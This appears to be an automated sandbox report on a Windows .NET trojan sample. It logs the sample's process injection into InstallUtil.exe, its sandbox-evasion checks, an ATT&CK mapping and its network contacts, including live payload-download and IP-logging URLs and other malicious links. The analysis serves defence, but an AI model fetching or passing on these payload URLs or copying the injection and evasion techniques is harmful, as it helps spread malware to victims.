Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1622766007.0000000006150000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: InstallUtil.exe, 0000000B.00000002.2494805601.00000000006C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1622766007.0000000006150000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: 806010189GSOFTWARE\VMware, Inc.\VMware VGAuth

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 277008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	211 Process Injection	1 Access Token Manipulation	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Disable or Modify Tools	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	41 Virtualization/Sandbox Evasion	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Process Injection	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	29%	ReversingLabs
SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	32%	Virustotal		Browse
SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	100%	Avira	HEUR/AGEN.1309843
SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
yip.su	7%	Virustotal	Browse
pastebin.com	0%	Virustotal	Browse
iplogger.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://iplogger.com/1djqU4	0%	Avira URL Cloud	safe
https://yip.su	0%	Avira URL Cloud	safe
http://pastebin.com	0%	Avira URL Cloud	safe
https://pastebin.com	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://yip.su/RNWPd.exe	100%	Avira URL Cloud	malware
https://pastebin.com/raw/V6VJsrV3	100%	Avira URL Cloud	malware
https://yip.su	7%	Virustotal		Browse
https://iplogger.com/1djqU4	2%	Virustotal		Browse
https://pastebin.com/raw/V6VJsrV3	7%	Virustotal		Browse
https://pastebin.com	0%	Virustotal		Browse
http://yip.su	0%	Avira URL Cloud	safe
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
http://pastebin.com	0%	Virustotal		Browse
https://yip.su/RNWPd.exe	16%	Virustotal		Browse
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	0%	Virustotal		Browse
http://yip.su	7%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
yip.su	188.114.97.3	true	false	7%, Virustotal, Browse	unknown
pastebin.com	172.67.19.24	true	true	0%, Virustotal, Browse	unknown
iplogger.com	172.67.188.178	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.com/1djqU4	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com/raw/V6VJsrV3	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://yip.su/RNWPd.exe	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	InstallUtil.exe, 0000000B.00000002.2496478302.0000000002415000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002562000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002522000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000024C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000023F3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 0000000B.00000002.2496478302.0000000002331000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yip.su	InstallUtil.exe, 0000000B.00000002.2496478302.0000000002459000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000023F3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002490000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pastebin.com	InstallUtil.exe, 0000000B.00000002.2496478302.0000000002486000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com	InstallUtil.exe, 0000000B.00000002.2496478302.0000000002486000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.00000000023F3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://yip.su	InstallUtil.exe, 0000000B.00000002.2496478302.0000000002459000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2496478302.0000000002490000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1614555856.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2491714725.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	InstallUtil.exe, 0000000B.00000002.2496478302.000000000243D000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	yip.su	European Union	13335	CLOUDFLARENETUS	false
172.67.188.178	iplogger.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1491227
Start date and time:	2024-08-11 11:20:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 96% Number of executed functions: 126 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 7628 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:16:05	API Interceptor	7x Sleep call for process: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe modified
07:16:09	API Interceptor	629045x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.19.24	sostener.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
188.114.97.3	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	www.qqkartel88v1.com/md02/?zVxh=-ZtHx&CB=v/CEznv/hMaH4fwWFhy7ytukhIx2w22qOwaWtBuVPfDrtHo+17oXaaCjpEEIVjfI5jx5
	7MZSs0P9IvJHGya.exe	Get hash	malicious	FormBook	Browse	www.822963429.xyz/ps15/?9rjLl=JM/3ohIODlYe1IMZbipdMjABBl9r8VzvPtnOyjV8RkUV1iZ4eTnPJHMnHsGXxKCc07OJ&3fpXG=S6Almpi
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/BSxUNaT1/download
	b1rtNoexdE.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	199719cm.nyashka.top/ToPythonRequestupdateBigloadDbTrackwplocal.php
	http://us-ledgerlive.com/	Get hash	malicious	Unknown	Browse	us-ledgerlive.com/
	http://nike.m-h-azaddel9225.workers.dev/	Get hash	malicious	Unknown	Browse	nike.m-h-azaddel9225.workers.dev/cdn-cgi/challenge-platform/scripts/jsd/main.js
	BlazeHack.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	CKHSihDX4S.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	XXZahG4d9Z.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	PAYMENT ERROR.exe	Get hash	malicious	FormBook	Browse	www.legacycommerceltd.com/oi12/?XzrtQJx=zgYRRvdyGaV1CIo0QcGNfxfpiIRlgUt3QYeNcPlb0pKn5vsN5eriLRLsx83JezlODSWbZyR3yA==&QpCLi=0bpdGDM8Qnw4Jd30

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yip.su	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Get hash	malicious	Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	DarkTortilla	Browse	188.114.96.3
	file.exe	Get hash	malicious	DarkTortilla, Neoreklami	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Inject5.6732.13710.8794.exe	Get hash	malicious	Cryptbot, Neoreklami	Browse	188.114.97.3
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	188.114.97.3
	8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exe	Get hash	malicious	Bdaejec	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, Glupteba	Browse	104.21.79.77
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	104.21.79.77
	LIRR4A0xzv.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	172.67.169.89
	dl7WL77rkA.exe	Get hash	malicious	Glupteba, Mars Stealer, Stealc, Vidar	Browse	172.67.169.89
pastebin.com	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.TrojanX-gen.4310.13330.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.TrojanX-gen.12253.7599.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	SecuriteInfo.com.Win64.TrojanX-gen.19310.4810.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	SecuriteInfo.com.Win64.TrojanX-gen.4310.13330.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	SecuriteInfo.com.Win64.TrojanX-gen.12253.7599.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.TrojanX-gen.24297.1009.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	SecuriteInfo.com.Win64.TrojanX-gen.17260.5217.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.TrojanX-gen.19310.4810.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
iplogger.com	file.exe	Get hash	malicious	DarkTortilla	Browse	172.67.188.178
	yLfAxBEcuo.exe	Get hash	malicious	Cryptbot, Vidar, Xmrig	Browse	172.67.188.178
	Arc453466701.msi	Get hash	malicious	Unknown	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	Arch0000000000.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	3qWvYGcbza.exe	Get hash	malicious	Unknown	Browse	172.67.188.178
	3qWvYGcbza.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	setup.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	YCImxTWoQs.exe	Get hash	malicious	RedLine	Browse	104.21.76.57

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://translate.google.com/translate?sl=auto&tl=en&hl=en&u=4a66884dbc.nxcli.io/temp/user/login.php?click=m_news_0012%26googlePIDR=kparker@maryland.gov%26id_list=KUSptJlkOPoUXHIyOLOr	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	Return_shipping_label.js	Get hash	malicious	Unknown	Browse	162.159.135.233
	PR_Form_20240809_145815.exe	Get hash	malicious	FormBook	Browse	172.67.165.71
	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	7MZSs0P9IvJHGya.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	PR_Form_20240809_145815.bat.exe	Get hash	malicious	FormBook	Browse	104.21.57.181
	easypcoptimizersetup.exe	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	Amadey, DarkTortilla, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	188.114.96.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
CLOUDFLARENETUS	https://translate.google.com/translate?sl=auto&tl=en&hl=en&u=4a66884dbc.nxcli.io/temp/user/login.php?click=m_news_0012%26googlePIDR=kparker@maryland.gov%26id_list=KUSptJlkOPoUXHIyOLOr	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	Return_shipping_label.js	Get hash	malicious	Unknown	Browse	162.159.135.233
	PR_Form_20240809_145815.exe	Get hash	malicious	FormBook	Browse	172.67.165.71
	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	7MZSs0P9IvJHGya.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	PR_Form_20240809_145815.bat.exe	Get hash	malicious	FormBook	Browse	104.21.57.181
	easypcoptimizersetup.exe	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	Amadey, DarkTortilla, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	188.114.96.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
CLOUDFLARENETUS	https://translate.google.com/translate?sl=auto&tl=en&hl=en&u=4a66884dbc.nxcli.io/temp/user/login.php?click=m_news_0012%26googlePIDR=kparker@maryland.gov%26id_list=KUSptJlkOPoUXHIyOLOr	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	Return_shipping_label.js	Get hash	malicious	Unknown	Browse	162.159.135.233
	PR_Form_20240809_145815.exe	Get hash	malicious	FormBook	Browse	172.67.165.71
	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	7MZSs0P9IvJHGya.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	PR_Form_20240809_145815.bat.exe	Get hash	malicious	FormBook	Browse	104.21.57.181
	easypcoptimizersetup.exe	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	Amadey, DarkTortilla, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	188.114.96.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.22.46

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Return_shipping_label.js	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	zFONuE0fId.exe	Get hash	malicious	Quasar, AsyncRAT, DCRat, Orcus, XWorm	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	http://methhsmaskloogine.gitbook.io/usa	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	https://pub-4a58b26311a545f896e2fe8f473f1603.r2.dev/ledge.html	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	http://help-metiumsk-pages.gitbook.io/us	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	http://www.dysonus.com/wp/CHFINAL/b3e19/send1.php	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.js	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178
	https://primaprom.com/ch/SWISS/	Get hash	malicious	Unknown	Browse	172.67.19.24 188.114.97.3 172.67.188.178

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
MD5:	EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
SHA1:	B2A052ACB64FC7173E568E1520AA4D713C5E90A3
SHA-256:	50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
SHA-512:	D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, 